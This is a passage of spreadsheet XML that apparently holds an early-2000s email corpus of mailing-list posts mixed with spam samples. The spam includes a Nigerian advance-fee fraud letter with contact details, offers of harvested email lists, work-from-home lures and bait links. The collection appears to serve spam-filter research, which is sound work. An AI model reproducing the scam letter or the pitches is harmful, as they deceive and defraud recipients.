 &gt;  
 &gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Re[2]: Al'Qaeda's fantasy ideology:  Policy Review no. 114
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Aug 17, 2002 at 01:51:25AM -0400, Gary Lawrence Murphy wrote:
 &gt; Hate-lit
 By choosing that term you are certainly attempting to frame the debate by
 choosing a fear-charged word.
 &gt; What if they operate by the same neural-annealing Maxima-Minima
 &gt; gratification mechanisms as you or I and every other creature on this
 &gt; planet?  
 If somebody maximizes their gratification by slaughtering people, we
 shouldn't just try to understand them. We should try to stop them. You
 seem to have forgotten this in your moral relativism. Everybody is
 justified in their own head. This doesn't mean we forgive mass murders,
 or ignore their acts. They are still guilty and abhorrent. We do
 understand them better when we see them as a flawed human being, like
 any one of us.
 &gt; When both sides can call the other "evil" to the cheers of their local
 &gt; public and media, you can bet something's rotten in the state of Denmark.
 Calling "the other side" evil is a time-honored tradition. It is less 
 of a stepping point for an analysis of the situation than it is for an
 analysis of human nature in general.
 &gt; I guess that's why I live in the woods.  Bears and racoons I
 &gt; understand, but I really just don't 'get' people.
 People require a touch more effort.
 -- 
 njl
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: your help
</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR SIR,
 I am MRS MARIAM ABACHA, wife of the late Nigerian
 Head of State, General Sani Abacha who died on 
 the 8th
 of June 1998 while still on active duty. I am
 contacting you in view of the fact that we will 
 be of
 great assistance to each other likewise 
 developing a
 cordial relationship.
 I currently have within my reach the sum of 
 thirty
 six million United States Dollars 
 (US$36,000,000) in
 cash, which I intend to use for investment 
 purposes
 specifically in your country. This money came 
 as a
 result of a payback contract deal between my 
 late
 husband and a Russian firm on our country's
 Multi-Billion Dollars Ajaokuta Steel Plant. The
 Russian partners returned my husbands share of
 US$36,000,000 after his death and lodge it with 
 my
 late husband's security company in Nigeria of 
 which I
 am a director. Right now the new civilian 
 government
 have intensified their probe on my husband's 
 financial
 resources and they have revoked our licenses 
 that
 allows us to own a financial and oil company. 
 In view
 of this, I acted very fast to withdraw the
 US$36,000,000 from the company's vault and 
 deposited
 it in a privately erected security safe abroad.
 No record ever existed concerning the money 
 neither is
 the money traceable by the Government because 
 there is
 no documentation showing that we received the 
 money
 from the Russians.
 Due to the current situation in the country 
 concerning
 Government attitude towards my family, it has 
 become
 quite impossible for me to make use of this 
 money
 within, thus I seek assistance to transfer this 
 money
 into your safe bank account. On your consent, I 
 shall expect
 you to contact me urgently to enable us discuss
 details of this transaction.
 Bearing in mind that your assistance is needed 
 to
 transfer the funds, I propose a commission of 
 20% of
 the total sum to you for the expected services 
 and
 assistance. Your urgent response is highly 
 needed so
 as to stop further contacts. all correspondent 
 should be forwarded to this EMAIL:zenab.m@ompadec.zzn.con
 or you can call my son mobile:hamza   234-8023137978 I  use this 
 opportunity to implore you to exercise the most 
 utmost
 indulgence to keep this matter extra ordinarily
 confidential what ever your decision while I 
 await your
 prompt response.
 Best personal regards,
 MRS MARIAM ABACHA.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</si>
  <si>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Re[2]: Bukkake
</t>
  </si>
  <si>
    <t xml:space="preserve">James Rogers:
 &gt;I don't think there is a specific word in English
 &gt;for eye goop.
 "Sleep. n. .. 3. A crust of dried tears or mucus
 normally forming around the inner rim of the eye
 during sleep."
 But I think muta is a fine word for it.
 _________________________________________________________________
 Join the worlds largest e-mail service with MSN Hotmail. 
 http://www.hotmail.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Email Marketing
</t>
  </si>
  <si>
    <t xml:space="preserve">Email marketing works!  There's no way around it.
 No other medium let's you share your offer with more 
 people for less than the cost of a small classified ad.
 Get access to our targeted email list exchange where 
 our members can exchange their old targeted email lists for new ones.
 Get access to over 1 million fresh general emails every week.
 We offer all the services above for free.
 Buyers are out there, marketing is the key.
 Signup today at http://68.62.73.31
 Limited membership
 This is a one time message, you will not be emailed again.
</t>
  </si>
  <si>
    <t xml:space="preserve">Reza B'Far (eBuilt) wrote:
  &gt; problems.... Why do most computer scientists insist on solving the
  &gt; same problems over and over again when there are some many more
  &gt; important and interesting problems (high level) to be solved ?????
 Amen!
 Doing it in an (unecessarily) harder way does NOT make you more of a man
 (or less of a kiddie).
 - Joe
 -- 
 The Combatant State is your father and your mother, your only
 protector, the totality of your interests. No discipline can
 be stern enough for the man who denies that by word or deed.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 25 Sep 2002, Joseph S. Barrera III wrote:
 &gt; Let's say you're behind a firewall and have a NAT address.
 &gt; Is there any way to telnet to a linux box out there in the world
 &gt; and set your DISPLAY in some way that you can create
 &gt; xterms on your own screen?
 As other people suggested: SSH. PuTTY 
 	http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
 can do it. Can run, say xclock (I'm running an X server under W32 at work,
 tunneling through a NAT box), but from Linux, not from Solaris.  Probably
 OpenSSH misconfigurat5ion.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Marketing your business via the Internet
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;&lt;TITLE&gt;Online Marketing Strategies&lt;/TITLE&gt;&lt;META http-equiv=3DContent=
 -Type content=3D"text/html; 
 charset=3Dwindows-1252"&gt;&lt;META content=3D"MSHTML 5.50.4134.100" name=3DGENE=
 RATOR&gt;&lt;META content=3DFrontPage.Editor.Document name=3DProgId&gt;
     &lt;/HEAD&gt;&lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#FFFFFF leftMarg=
 in=3D0&gt;
      &lt;DIV align=3Dcenter&gt;&lt;CENTER&gt;&lt;TABLE height=3D0 cellSpacing=3D0 cellPad=
 ding=3D0 width=3D500 border=3D0&gt;
 	&lt;TBODY&gt;&lt;TR&gt;&lt;TD width=3D"100%" height=3D200&gt;&lt;P align=3Dcenter&gt;
 	&lt;FONT face=3D"Georgia, Times New Roman" size=3D7&gt;
 	&lt;B&gt;&lt;FONT color=3D#08296b&gt;Need More Clients?&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;P align=
 =3Dcenter&gt;
 	&lt;FONT face=3D"Times New Roman" size=3D5&gt;&lt;B&gt;&lt;FONT color=3D#ff0000&gt;
 	Increase Your Sales 15%-40% Every Month!&lt;/FONT&gt;&lt;/B&gt;
 &lt;HR&gt;
 &lt;FONT color=3D#ff0000&gt;&lt;B&gt;&lt;FONT face=3D"Times, New Roman" color=3D#08296b s=
 ize=3D3&gt;
 Targeted E-mail Marketing Is A Proven Method For Return Sales&lt;br&gt;
 &lt;/FONT&gt;&lt;/B&gt;
 &lt;FONT color=3D#000000 size=3D3&gt;
   With a database of over 150 million "targeted" addresses, we can reach y=
 our potential clients
   anywhere in the world.  Our staff creates interactive ad campaigns, spec=
 ifically targeted to 
   your client base, and designed to produce staggering responses for your =
 business.  A steady 
   lead source can make sure your sales team will consistently close deals.
 &lt;/FONT&gt;
 &lt;P&gt;
    &lt;FONT face=3D"Times, New Roman" size=3D3&gt;&lt;B&gt;&lt;FONT color=3D#08296b&gt;The G=
 reatest 
       Return On Your Marketing Dollar&lt;/FONT&gt;&lt;/B&gt;
 &lt;FONT color=3D#000000&gt;&lt;BR&gt;&lt;FONT size=3D3&gt;Targeted e-mail marketing is the =
 most effective way to reach
 global and local markets with a small expense compared to that of conventi=
 onal marketing.  
 Quality work and a dedicated professional staff will ensure your ad campai=
 gn to be successful.  
 Put our educated team of marketers to work for you.&lt;br&gt;&lt;br&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/p&gt;=
 &lt;/tr&gt;&lt;/td&gt;&lt;/tbody&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#08296b size=3D4&gt;Fill out the form be=
 low to speak
 with one &lt;br&gt;of our marketing specialists.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE=
 &gt;
 &lt;P&gt;&lt;FONT color=3D#08296b size=3D2&gt;Required Input Field&lt;FONT color=3D#ff000=
 0
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks1802@firemail.de?subject=3DE-marketing_=
 Inquiry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#ff0000
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#ff0000 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Times, New Roman" color=3D#08296b size=3D2&gt;Type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face=3D"Times, New Roman" color=3D#08296b
       size=3D1&gt;To be removed, please  
       &lt;A href=3D"mailto:d_lete5634@lycos.co.uk?subject=3DRemove_E-marketin=
 g"&gt;Click 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;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</si>
  <si>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[ILUG] Free Cell phone with any Plan!
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by  (spock@1andonly.com) on Sunday, July 28, 19102 at 15:37:19
 ---------------------------------------------------------------------------
 message: Free Cell phone with any Plan! We have all the latest Phones for FREE!!!! Please click the link below to Choose your Free Cellphone! - http://www.reelten.com/redirect/index.html - Deals with Verizon, Pacbell, ATT, and many more! -        If you have received this Email in error please contact: lon_chaney_jr@hotmail.com with subject: remove. 
 ---------------------------------------------------------------------------
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: my pic
</t>
  </si>
  <si>
    <t xml:space="preserve">------000000000000000000000
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 Hi Sweetie,
 Come see me and my Hot girl friends school at our new web site-&gt;
 http://picturepost.phreehost.com/mypic/
 Come to see FAST before delete this page.
 ------000000000000000000000--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] need to restart mass-checks (was: Re: 2.40 release procedure)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Bart Schaefer said:
 &gt; Just FYI, spamassassin_pre_2_4_0b appears to be the head revision, and is 
 &gt; not the same as the tip of the b2_4_0 branch.
 oops.  OK, now fixed; I've updated b2_4_0 to match what I wanted,
 accordingly.  As a result, mass-checks do *NOT* need to be restarted as
 the code and rules are the same as they were on HEAD.
 cvs tag spamassassin_pre_2_4_0b
 So, in full, here's the changes that are in spamassassin_pre_2_4_0b that
 were not there before the branch:
   - rules fixed: HTTP_ESCAPED_HOST, HTTP_CTRL_CHARS_HOST.  they were too
     lax and caused FPs
   - Matt's faster HTML parser
   - commented rules un-commented again
   - a doco fix for spamd
 and, for completeness, the relevant changes since Saturday:
   - the INSTALL file ;)
   - CALL_NOW now starts on a word boundary
   - Added examples to -R docs
   - Added Habeas HIL lookup
   - bug 385: spamcheck.py should handle 4xx errors -- full mailboxes etc.
     -- with EX_TEMPFAIL. patch from ckd-spamassassin@ckdhr.com
     (Christopher Davis) applied.
   -  made spamcheck.py use exit code 75 if it cannot connect to spamd,
      fixes bug 655
   - spamd/spamd.raw: fixed bug 704: spamd was not able to unlink pid file
     with -u arg
   - Makefile.PL: installing to random dirs now works fine
   - move MAILER_DAEMON into 70_cvs_rules_under_test.cf since it has been
     improved remove extraneous mass-check line for DATE_YEAR_ZERO_FIRST
   - spamassassin.raw: merged -Z with -D
   - removed eff.org from whitelists, as per Marc's request
   - mass-check: added versioning and date to mass-check output
   - bug 658: ok_locales set to 'en' by default. changed to 'all', users
     will have to customise for themselves.   Made many tests which trigger
     FPs on mail in ISO-2022-JP charsets, meta rules depending on
     __ISO_2022_JP_DELIM.
   - fixed phrase-freq code for vastly better performance
   - rules/50_scores.cf: changed LISTBUILDER score back to -5.0
   - lib/Mail/SpamAssassin/HTML.pm: catch background images in uri code
     catch additional types of web bugs
   - rules/20_body_tests.cf: change CASHCASHCASH to meta rule to avoid
     Japanese false matches, revise spam phrases descriptions to be clearer
     (since a few are now basically compensation tests (please don't move
     them to the compensation file))
   - fixed bug in MIME_SUSPECT_NAME: text/plan attachments called foo.html
     were triggering.
   - revise HTML comment tests to use HTML parser
   - revise MAILER_DAEMON rule (get rid of some spam matches without losing
     any nonspam matches)
   - raise some negative scores that are way too low
   - remove "Friend" from DEAR_SOMETHING since it overlaps with DEAR_FRIEND
     and can match "dear friend" in middle of sentence too much
   - require "Dear Friend" to start the paragraph
   - add new HTML tests for font colors and faces, reduce number of
     different eval functions needed for HTML tests
 --j.
 -- 
 'Justin Mason' =&gt; { url =&gt; http://jmason.org/ , blog =&gt; http://taint.org/ }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</si>
  <si>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
 &gt; Zimbabwe has dropped objections to accepting genetically modified (GM) grain
 &gt; so that urgently-needed food aid can be delivered, says the UN food agency.
 Yes, confirming what I said in my last message. Ah! I see where the problem 
 lies! You seem to be labouring under the misapprehension that Zimbabwe and 
 Zambia are the same country. 
 Martin
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home for Top $
 http://us.click.yahoo.com/RrPZMC/jTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: # Elliptic Curve Point Counting, made easy
</t>
  </si>
  <si>
    <t xml:space="preserve">Gordon Mohr wrote:
 &gt;Does this mean that Eliptic Curve encryption is
 &gt;now easily breakable? Or faster than before with
 &gt;no loss in strength? Or stronger?
 &gt;
 &gt;Raw bits are OK, cooked bits are better.
 Oh.  OK.
 These results don't help break EC crypto at all.
 With RSA, you pick a number with secret factors and to break the
 cryptosystem, you can factor the number.  Due to fast sub-exponential
 algorithms for factoring, the number had better be 1024 bits at the
 very least (record = 524 bits).
 With EC, you pick a curve and pick points on the curve with secret
 discrete logarithm.  To break the cryptosystem you can compute a
 discrete log but the best algorithms for random curves are exponential
 (record = 109 bits, for a slightly special curve).
 Up until now, people pick curves chosen from a small fixed set.  One
 choice is a few curves with special properties that originally were
 chosen to make point-counting easier, and can also speed up the crypto
 operations, but in some cases they can also speed up attacks, not on
 curves deployed at the moment but the danger exists.  The other
 choice is to precompute a handful of random curves.  The NSA did this
 a few years ago when it took hours on a fast machine and NIST
 standardized those curves.
 What changes is that it is now possible is to generate your own curves
 on an ordinary PC.  This has been getting easier and easier, with
 small curves taking seconds on a fast machine since a year or two.
 Now even reasonably big curves take seconds on a typical PC.
 This means that you don't have to rely on standard curves but can
 distribute risk over many curves in case some get broken at some
 stage.  In certain circumstances you can even keep the curve itself
 secret so an attacker doesn't know which discrete log to try to
 compute!  There isn't really a good analogy with RSA, but imagine
 wanting to factor a number and you don't even know what it is...
 So basically recent progress has made new things feasible and this
 makes them even more so.  The underlying primitives for signing,
 encoding and so on are not affected, but the security vibes get better.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Folder computed replcomps (and replgroupcomps
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Is there a relatively clean way to dynamically build comp files based on
 the path of the current folder?
   Yeah, I know exmh will pull the first comp in the path up from the
   current folder to the mail root, but that's not what I want.
 I'm starting to use plus addressing heavily as part of my SPAM controls.
 Specifically I each mailing list with a list-specific address.
   eg I would subscribe to this list as claw+exmh@kanga.nu or perhaps
   claw+exmh-users@kanga.nu instead of claw@kanga.nu
 However to do this I need a new set of comp files for each list folder.
 As I'm subscribed to something just over 600 lists, that's rather a
 pain.  I really don't want to go create and maintain ~1,800 comp files
 (components, replcomps, replgroupcomps), especially not as I suspect
 I'll be changing or adapting my naming pattern a few times as I adapt
 various supporting tools.
 What would be great is if I could build the relevant comp file
 dynamically at runtime.  That way I don't need to maintain a couple
 thousand comp files, I just need to make my plus addresses
 predictable/computable based (say) on the folder path.
   eg I'm currently in folder:
     +-Lists-/Products/Exmh-L
     The script would dynamically build a compfile which had a From: of
     claw+exmh@kanga.nu for repl, comp, etc.
   Similarly when in folder:
     +-Lists-/Linux/SVLUG-L
   I'd get a From: of claw+svlug@kanga.nu
 That way I can use lookup tables for those folders which have multiple
 lists being delivered into them.
 Any ideas how this might be done in an automatic/maintainable fashion?
 It would be more than good enough if all I had to do was drop a tiny
 FROM_HEADER file in each folder that somehow got picked up by the comp
 file...
 -- 
 J C Lawrence                
 ---------(*)                Satan, oscillate my metallic sonatas. 
 claw@kanga.nu               He lived as a devil, eh?		  
 http://www.kanga.nu/~claw/  Evil is a name of a foeman, as I live.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Sadly, the last time I looked at it, it was only the console irssi client, 
 no X :(
 --On Wednesday, July 24, 2002 00:18:27 +0200 Roy-Magne Mo 
 &lt;rmo@sunnmore.net&gt; wrote:
 &gt; Seems like irssi.org also has an apt-rpm repository for snapshots of
 &gt; irssi:
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Help wanted.  We are a 14 year old fortune 500 company, that is
 growing at a tremendous rate.  We are looking for individuals who
 want to work from home.
 This is an opportunity to make an excellent income.  No experience
 is required.  We will train you.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.basetel.com/wealthnow
 We are looking for energetic and self motivated people.  If that is you
 than click on the link and fill out the form, and one of our
 employement specialist will contact you.
 To be removed from our link simple go to:
 http://www.basetel.com/remove.html
 7749doNL1-136DfsE5701lGxl2-486pAKM7127JwoR4-054PCfq9499xMtW0-594hucS91l66
</t>
  </si>
  <si>
    <t xml:space="preserve">hmm, I've never used gentoo
 so I'll have to take your word
 on that.  Perhaps something 
 similar to that Ximian RedHat
 dealy would be cool.  Like
 a gui installer for slackware![1]
 ;]
 shane
 [1]I'm shure Patrick V. would love
 that.(not)
 -----Original Message-----
 From: John P. Looney [mailto:valen@tuatha.org]
 Sent: 13 August 2002 10:01
 To: ilug@linux.ie
 Subject: Re: [ILUG] SUSE 8 disks? (thread changed slightly)
 On Tue, Aug 13, 2002 at 09:55:49AM +0100, Ryan, Shane mentioned:
 &gt; It *is* a good idea though.  I've been 
 &gt; wondering about the same thing for a couple
 &gt; of months now but always considered it too
 &gt; complicated to carry out. (If that makes any
 &gt; sense at all).
  It is to complex. Look at the mess that is gentoo. Just because you can
 do something, doesn't mean you should.
 Kate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</si>
  <si>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RE: [Spambayes] New web training interface for pop3proxy
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Paul&gt; I suspect the best answer is to make the DBM implementation
     Paul&gt; configurable via bayescustomize.ini (with the default being
     Paul&gt; anydbm).
 I think you might want to specify the database open function instead of just
 the module.  There are three ways to open db files with bsddb (btopen,
 hashopen, rnopen).  That will require a little more trickery in Options.py,
 but not an insane amount.
 Skip
 _______________________________________________
 Spambayes mailing list
 Spambayes@python.org
 http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Pics and thanks
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I gota thank all you kind folk who sent thier well wishes our way. It was
 a bumpy ride but everything is working out and allthe good vibes are a
 tremendous help. Ive saved each one and along with the cards and other
 emails we have been getting we are goign to print them out add them to
 Benjamins baby book.
 Ive had just enough time to Gimp up a pic so folks can see the little
 bloke. Head on over to http://wsmf.blogspot.com/ and have a gander at the
 boy.
 -tom(i cant feedem so I changem)whore
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: webmaster, Moving?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html"&gt;
 	&lt;title&gt;Foreclosure World's Premium Moving Source&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;P&gt;&lt;a href="http://www.foreclosureworld.net/cgi-bin/click.cgi?c=24"&gt;&lt;IMG alt="FREE Moving Cost Estimate!" border=0 src="http://www.foreclosureworld.net/images/hb_anim.gif" width="700" height="250"&gt;&lt;/a&gt; &lt;/P&gt;
 &lt;P&gt;webmaster,&lt;/P&gt;
 &lt;P&gt;Save up to 50% of your MOVING costs! &lt;/P&gt;
 &lt;P&gt;Get FREE MULTIPLE MOVING COST ESTIMATES From Professional Prescreened 
 Movers.&lt;/P&gt;
 &lt;P&gt;Start your move on the right foot - It's easy to get your &lt;FONT color=#ff0000&gt;&lt;STRONG&gt;FREE &lt;/STRONG&gt;&lt;/FONT&gt;quotes:&lt;/P&gt;
 &lt;P&gt;1. Click on the highlighted link below&lt;BR&gt;2. Fill out the form and 
 submit your request&lt;BR&gt;3. Get quotes from movers, compare rates and hire the best mover&lt;/P&gt;
 &lt;P&gt;Get &lt;STRONG&gt;&lt;FONT color=#ff0000&gt;FREE &lt;/FONT&gt;&lt;/STRONG&gt;Quotes Now:&lt;BR&gt;
 &lt;a href="http://www.foreclosureworld.net/cgi-bin/click.cgi?c=21"&gt;http://www.foreclosureworld.net/cgi-bin/click.cgi?c=21&lt;/a&gt;&lt;BR&gt;
 AOL Users: &lt;a href="http://www.foreclosureworld.net/cgi-bin/click.cgi?c=21"&gt;Click Here&lt;/a&gt;&lt;/P&gt;
 &lt;P&gt;Moving Locally? Long Distance? Self Service? Small move? Car shipping?&lt;BR&gt;&lt;A href="http://www.foreclosureworld.net/cgi-bin/click.cgi?c=22"&gt;http://www.foreclosureworld.net/cgi-bin/click.cgi?c=22&lt;/A&gt;&lt;BR&gt;
 AOL Users: &lt;a href="http://www.foreclosureworld.net/cgi-bin/click.cgi?c=22"&gt;Click Here&lt;/a&gt;&lt;/P&gt;
 &lt;P&gt;Check out our movers network and request quotes&lt;BR&gt;&lt;A href="http://www.foreclosureworld.net/cgi-bin/click.cgi?c=23"&gt;http://www.foreclosureworld.net/cgi-bin/click.cgi?c=23&lt;/A&gt;&lt;BR&gt;
 AOL Users: &lt;a href="http://www.foreclosureworld.net/cgi-bin/click.cgi?c=22"&gt;Click Here&lt;/a&gt;&lt;/P&gt;
 &lt;P&gt;&lt;BR&gt;Regards webmaster, &lt;/P&gt;
 &lt;P&gt;Your Friends At &lt;BR&gt;Foreclosed Homes &lt;/P&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;TABLE ALIGN="center" BORDER="0" WIDTH="580" CELLSPACING="0" CELLPADDING="0"&gt;&lt;TR&gt;&lt;TD&gt;
 To unsubscribe or change subscriber options click:
 &lt;A HREF="http://www.aweber.com/z/r/?7EyszLRMDAxsjMws7A=="&gt;click here&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;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</si>
  <si>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Want to Make a million!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Want to make a million bucks this year?
 Me too but it's probably not going happen!
 However if your looking for the opportunity to
 make a couple thousand a week,
 working form home, with your pc, we need to talk.
 If you're over 18 and a US resident,
 Just Click REPLY
 Send me your Name, State,
 Complete telephone number,
 and the best time to contact you.
 I will personally speak with you within 48 hours.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</si>
  <si>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One scam to rule them all..
</t>
  </si>
  <si>
    <t xml:space="preserve">One scam to rule them all,
 One scam to bind them, 
 One scan to burn them all, 
 And the stupidity bind them. 
 (Yes, i'm ripping, and badly from LOTR) 
 Alright, so NPR's All Things Considered had a wonderful story on the whole Nigerian 419 scams that seem to be running
 into my inbox constantly (Thanks FoRK!) Turns out, these 419 scams (419 is the statute in Nigeria that this particular form
 of fraud falls under) have actually snared a few people -- NPR reported to the tune of 100 million dollars over a few years, in the US alone.
 One website listed the 419 scam as being the 'third to fith largest industry in Nigeria' (1), netting billions of dollars
 from around the world.   Its large enough to warrant a governmental investigation and a special number to call and report
 (to the secret service, no less) scam abuse. (2)   Folks are apparently being held for ransom if they decide to go
 'check out' the scam.  (3).
 Listen to the NPR article (4).   What's great about NPR is the commentary at the end. Turns out, this is all unbelievably
 common.   The origination, at least to NPR's knowledge, starts with the scam elements being transposed from Nigeria,
 to London, England.   Instead of the bereved widow of a Nigerian national, the originating con was directed to the 'heirs'
 of Sir Frances Drake's estate.   If you were 'chosen' as an heir, you could contribute a portion of your money so that a
 fellow heir (and scam artist) could reclaim the monetary largess in the Court of England, by proving that Elizabeth I had
 nulled Sir Drake's will and taken his fortune as her own.   Oscar
 Hartzell, the gent who started this scam, way back in the early 1800s,
 managed to gain quite a fortune, all on the backs of idiots.   Sound familiar?
 A fool and his money, deserve to be parted. 
 (1) http://home.rica.net/alphae/419coal/
 (2) 'If you have received a letter, but have not lost any monies to this scheme, please fax a copy of that letter to
 (202) 406-5031.'  From:  http://www.secretservice.gov/alert419.shtml  --
 They also have a number for those idiots who have lost their money to this.  
 (3) http://www.crimes-of-persuasion.com/Crimes/Business/nigerian.htm
 (4) http://www.npr.org/ramfiles/atc/20020729.atc.12.ram  -- Go down to Nigerian 419 scams
 So i'm in a wierd mood, go figure.
 BB
 -- 
 Best regards,
  bitbitch                          mailto:bitbitch@magnesium.net
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Jul 31, 2002 at 02:40:26PM +0100 or so it is rumoured hereabouts, 
 Liam Bedford thought:
 &gt; On Wed, 31 Jul 2002 14:30:01 +0100
 &gt; jac1 claiming to think:
 &gt; 
 &gt; &gt; hi,
 &gt; &gt; i recently had to wipe linux from my pc but forgot to restore the original
 &gt; &gt; MBR (NT). Anyone know how i can do this? linux is entirely gone and no boot
 &gt; &gt; floppy. formatting the entire disk doesn't do it either.
 &gt; &gt; 
 &gt; boot from dos and fdisk /mbr?
 &gt; boot from an NT CD, choose repair, and make it check the mbr
